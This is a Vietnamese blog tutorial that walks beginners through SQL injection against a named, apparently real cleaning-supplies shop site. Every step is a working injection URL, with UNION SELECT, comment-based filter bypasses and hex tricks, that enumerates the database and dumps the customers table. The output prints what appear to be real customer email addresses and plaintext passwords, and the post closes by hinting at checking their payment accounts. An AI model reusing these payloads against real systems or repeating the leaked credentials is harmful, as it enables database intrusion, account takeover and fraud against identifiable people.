J2TEAM Security: A must-have extension for Chrome users. Install now!
Trang chủ
Bypass
SQL Injection

[Tut] Bypass 406 SQL for Newbie

Hôm này khai mạc Euro 2012 nên mình mạo muội làm cái tut sql dạng 406 cho Newbie mong các bạn biết rồi đừng ném gạch nhuể.

Site:

Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
+ Order by:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
-->Ko lỗi.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
-->lỗi.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Tiến hành By pass:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
-> 1
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+Tiếp tục by pass:
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
-->
articles,auth,categories,customers,manufacturers,o rders,products,specialfiles
+ Get colums: customers
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
-->
id,email,password,passhash,joindate,firstname,mi,l astname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders
+Get id,email,password:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
-->
4|dpdurrell@hotmail.com|preston59

3|josh@uppertech.net|eeq7322
----> Check PP .
Tut by Co0c.
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!